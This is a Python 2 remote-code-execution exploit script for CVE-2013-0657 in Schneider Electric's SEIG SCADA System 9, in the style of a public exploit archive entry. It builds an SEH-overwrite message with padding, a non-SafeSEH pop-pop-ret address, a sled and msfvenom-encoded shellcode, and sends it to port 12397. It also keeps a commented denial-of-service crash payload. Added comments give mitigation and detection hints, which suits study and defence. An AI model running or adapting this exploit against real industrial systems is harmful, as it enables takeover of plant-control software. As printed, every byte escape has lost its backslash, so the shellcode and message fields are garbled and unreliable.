# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657

import socket
import struct

# Proof-of-concept target: the SEIG SCADA listener on TCP port 12397 (author's lab
# address). The port number is the most reliable network-side indicator for this
# issue, since the rest of the message is attacker-controlled filler.
ip = "192.168.0.23"
port = 12397
con = (ip, port)

# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# Earlier crash trigger from the same research: an 8-byte length field followed by an
# over-long body. Kept for reference only; the chain below supersedes it.
# length = "x00x70x00x00x00x00x00x00"
# message = "x00x70AAx65x00x00x00AAAAAAAAAAAAAAAAx00x00x00x00"+"B"*28644
# payload = length+message

# Exploit Magic
# NOTE(review): the backslashes of the "\x.." escapes appear to have been lost in
# transcription on every line of this listing. As printed, each "xNN" is four plain
# ASCII characters, so the byte counts stated in the comments will not match the
# len(payload) printed at the end.
# This is Python 2 code: struct.pack() returns a str there, which is concatenated with
# string literals below. Under Python 3 struct.pack() returns bytes and these lines
# raise TypeError.
# Fixed 8-byte header: little-endian 32-bit 0x6014 followed by four more bytes. The
# meaning of each field is not documented on the page — presumably a message type and
# length; verify against the protocol before using these values as a detection rule.
message_header = struct.pack("<L", 0x6014) + "x66x66x07x00"
# Protocol body preceding the overflow; ends with big-endian 16-bit 0x6000. Field
# semantics unknown from here (see note above).
message_protocol_data = "x10x00x00x00" + "x19" + "x00x00x00x00x00" + "x04" + "x00x00x00" + struct.pack(">H", 0x6000)
# 3344 filler bytes — presumably the distance from the start of the body to the
# overwritten SEH record; the offset itself is not derivable from this page.
padding = "B" * 3344
# Handler address taken from a module compiled without SafeSEH. The mitigation story
# here is the usual one: a SafeSEH/DEP/ASLR-enabled build of every loaded module (and
# the vendor fix for CVE-2013-0657) removes this kind of gadget.
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)

# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b 'x00xFFx0Ax0D' -f python
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
# The payload is polymorphically encoded (5 shikata_ga_nai iterations), so a static
# byte signature on the shellcode body is unreliable; structural indicators (port,
# oversized message, long runs of a single filler byte) are the better detection hook.
nopsleed = "x41"*100 # x90 bad char bypass
shellcode = "xdaxcbxbdx0fx83x69x70xd9x74x24xf4x58x31"
shellcode += "xc9xb1x4bx83xe8xfcx31x68x14x03x68x1bx61"
shellcode += "x9cxa9xcfxd8x3axb3x6exfcx1cx37x54xf6xc7"
shellcode += "x93x5dx47xb3xd2x35xb1x3fx7dxdcx42xd7x81"
shellcode += "x59x48x93x7bx98x70x2ax6bx98x14xeaxc5x54"
shellcode += "x17x7cx8dx25x69x60x27x1exc7x8ax6axd8xcf"
shellcode += "xb6xc3x9dx5ax83xd6xeax88x14x7dx5ax55x71"
shellcode += "x90x85xb8x37x9ex3exd7x1ax76xf8xb1xb9x63"
shellcode += "xb7xefxa3xa6xc0xb8x12xb4x18x62x1axe1x9e"
shellcode += "x6fx7exa2x86x6cxf7x3ax31xbdx55x42x10xad"
shellcode += "x89x16xa0xb8x6axd6x4cx20xd9xadx81x58x77"
shellcode += "x0bxa3xaaxbax2cx49xf0x26xaaxabxcex5axc3"
shellcode += "x41x69x60xc4x58x71x71x9cx3fxbexc2xbcx49"
shellcode += "xddxabx89xf0x46xcbx1ax8axf1xdbxe5x54x1f"
shellcode += "xfbx30x3bxb1x17x97xb2x3ex31xf8x26x13x9c"
shellcode += "x16xddx26x7axe3x9bx6ex29x77x49xc7x97x98"
shellcode += "x39x7bx5fxcdxebx4ax39x6ex66x04xbcx6cxa6"
shellcode += "x87x01x63x4dxf3x35xc9x74x35xdfxe7x1fx0c"
shellcode += "xd0x69x80x8cx5cxdex63xfcx19x1bx8ex24x3b"
shellcode += "x7ex01x97x6fx67x8fx07x3fx32x13x23x80x7e"
shellcode += "x9ax01x5axc0x3cxf9xf5x5ax04xb0x54x46x0c"
shellcode += "xfbx21x4dxd7xe0xb4x02xe5x4cx04x5ax5ex37"
shellcode += "xd1x61x6dxe1x4dxe8xa8xdfx26xdbx55x5ax60"
shellcode += "x85x68x05x6ax21x73xdfx73xa4xefx26x02x7e"
shellcode += "xb0xb1xa6xb1xacx15x0fx80x34xaexe4x8a"

JUNK = "JUNK"*5202 # 20808 Bytes of JUNK

# Assemble the single message: header, protocol body, filler up to the SEH record,
# handler address, NOP-like sled, encoded shellcode, trailing junk.
# Detection note: one TCP session to port 12397 carrying a message of tens of
# kilobytes (the filler alone is 3344 + 20808 bytes as written) is far outside
# anything a legitimate client sends; that size threshold is a cheap IDS rule.
payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
print "Payload length: "+str(len(payload))

# Delivery: one connect, one send, a 10-byte read whose contents are discarded. The
# script does not check that send() wrote the whole buffer and does not close the
# socket explicitly.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
s.recv(10)